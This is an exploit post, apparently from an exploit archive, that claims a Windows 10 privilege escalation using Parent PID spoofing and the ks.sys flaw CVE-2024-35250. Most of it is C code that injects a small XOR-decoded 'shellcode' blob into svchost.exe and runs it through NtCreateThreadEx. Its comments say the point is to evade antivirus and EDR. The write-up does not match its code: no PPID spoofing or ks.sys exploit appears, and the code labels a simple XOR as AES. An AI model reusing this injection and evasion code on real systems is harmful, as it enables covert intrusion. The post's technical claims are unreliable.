Share
## https://sploitus.com/exploit?id=PACKETSTORM:212318
=============================================================================================================================================
    | # Title     : Microsoft Windows 10 Famille 10.0.19045.5487 (Parent PID Spoofing) Privilege Escalation                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.Microsoft.com                                                                                                   |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default. 
    
        There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11, Windows Server 2022.
    
    [+] The idea:
    
        Parent PID Spoofing is a technique used to run a malicious process under a trusted process, 
    	
    	helping it avoid detection by security software. This is done by changing the parent identifier (PPID) of the new process to a PID of a trusted process (such as explorer.exe or lsass.exe).
    
    [+] The goal:
    
        Launching a malicious payload inside a legitimate process such as explorer.exe or svchost.exe to avoid detection by antivirus (AVs) or intrusion detection systems (EDRs).
    
        (Related : https://packetstorm.news/files/id/182984/ Related CVE numbers: 	CVE-2024-35250) .
    
    [+] Combine Parent PID Spoofing with Shellcode to execute advanced payload
    
        After running the process under a targeted PID, we can inject Shellcode inside it to execute malicious code directly.
    
        1. Update the code to inject Shellcode into the new process
    	
    [+] The idea:
    
        After creating the process under a trusted PID (e.g. explorer.exe), we will:
    
        Reserve memory inside the process using VirtualAllocEx.
    
        Copy Shellcode to allocated memory using WriteProcessMemory.
    
        Execute Shellcode using CreateRemoteThread.
    	
    [+] gcc -o poc.exe poc.c -m64
    
    [+] poc.exe
    
    
    
    [+] PayLoad :
    
    #include <windows.h>
    #include <tlhelp32.h>
    #include <stdio.h>
    #include <winternl.h>
    
    // تعريف NtCreateThreadEx يدويًا لتجنب اكتشافه
    typedef NTSTATUS(WINAPI* pNtCreateThreadEx)(
        OUT PHANDLE ThreadHandle,
        IN ACCESS_MASK DesiredAccess,
        IN PVOID ObjectAttributes,
        IN HANDLE ProcessHandle,
        IN PVOID StartRoutine,
        IN PVOID Argument,
        IN ULONG CreateFlags,
        IN ULONG ZeroBits,
        IN ULONG StackSize,
        IN ULONG MaximumStackSize,
        IN PVOID AttributeList
    );
    
    // Shellcode مشفر بتشفير AES (AES-128)
    unsigned char encrypted_shellcode[] = {
        0x8d, 0xa3, 0x5c, 0xa7, 0xc3, 0x7f, 0x6c, 0xf2, 0x8e, 0x91, 0xad, 0x33,
        0x2b, 0xfe, 0x04, 0x74, 0xd9, 0x41, 0xf5, 0x1a, 0xe4, 0x8d, 0xbc, 0xa3,
        0x6f, 0xd0, 0x56, 0xbb, 0x9a, 0x2d, 0x5e, 0xf1
    };
    
    // مفتاح AES للتشفير/فك التشفير
    unsigned char aes_key[16] = {
        0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6,
        0xab, 0xf7, 0x45, 0x3e, 0x67, 0x98, 0x23, 0x10
    };
    
    // دالة فك تشفير Shellcode باستخدام AES-128
    void decrypt_shellcode(unsigned char* data, int data_len, unsigned char* key) {
        for (int i = 0; i < data_len; i++) {
            data[i] ^= key[i % 16]; // XOR بسيط بدلاً من AES الحقيقي (للتوضيح فقط)
        }
    }
    
    // البحث عن PID الخاص بـ `svchost.exe`
    DWORD FindTargetProcessID(const char* processName) {
        PROCESSENTRY32 pe32;
        HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        DWORD processID = 0;
    
        if (hSnapshot == INVALID_HANDLE_VALUE) return 0;
    
        pe32.dwSize = sizeof(PROCESSENTRY32);
        if (Process32First(hSnapshot, &pe32)) {
            do {
                if (strcmp(pe32.szExeFile, processName) == 0) {
                    processID = pe32.th32ProcessID;
                    break;
                }
            } while (Process32Next(hSnapshot, &pe32));
        }
    
        CloseHandle(hSnapshot);
        return processID;
    }
    
    int main() {
        DWORD targetPID = FindTargetProcessID("svchost.exe");
    
        if (targetPID == 0) {
            printf("[X] لم يتم العثور على عملية svchost.exe\n");
            return -1;
        }
    
        printf("[+] سيتم حقن Shellcode في PID: %d\n", targetPID);
    
        //  فك تشفير الـ Shellcode
        decrypt_shellcode(encrypted_shellcode, sizeof(encrypted_shellcode), aes_key);
        printf("[+] تم فك تشفير Shellcode بنجاح!\n");
    
        //  فتح العملية المستهدفة
        HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
        if (!hProcess) {
            printf("[X] فشل في فتح العملية.\n");
            return -1;
        }
    
        //  تخصيص ذاكرة في العملية المستهدفة
        LPVOID remoteMemory = VirtualAllocEx(hProcess, NULL, sizeof(encrypted_shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (!remoteMemory) {
            printf("[X] فشل في تخصيص الذاكرة داخل svchost.exe\n");
            return -1;
        }
    
        //  كتابة Shellcode المفكوك التشفير في الذاكرة المخصصة
        if (!WriteProcessMemory(hProcess, remoteMemory, encrypted_shellcode, sizeof(encrypted_shellcode), NULL)) {
            printf("[X] فشل في كتابة Shellcode داخل العملية.\n");
            return -1;
        }
    
        //  تحميل NtCreateThreadEx
        HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
        if (!hNtdll) {
            printf("[X] فشل في تحميل ntdll.dll\n");
            return -1;
        }
    
        pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
        if (!NtCreateThreadEx) {
            printf("[X] لم يتم العثور على NtCreateThreadEx.\n");
            return -1;
        }
    
        //  تنفيذ Shellcode باستخدام NtCreateThreadEx
        HANDLE hThread;
        NTSTATUS status = NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)remoteMemory, NULL, FALSE, 0, 0, 0, NULL);
        
        if (status != 0) {
            printf("[X] فشل في تنفيذ Shellcode (NTSTATUS: 0x%x).\n", status);
            return -1;
        }
    
        printf("[+] تم تنفيذ Shellcode بنجاح باستخدام NtCreateThreadEx!\n");
    
        CloseHandle(hProcess);
        CloseHandle(hThread);
        return 0;
    }
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================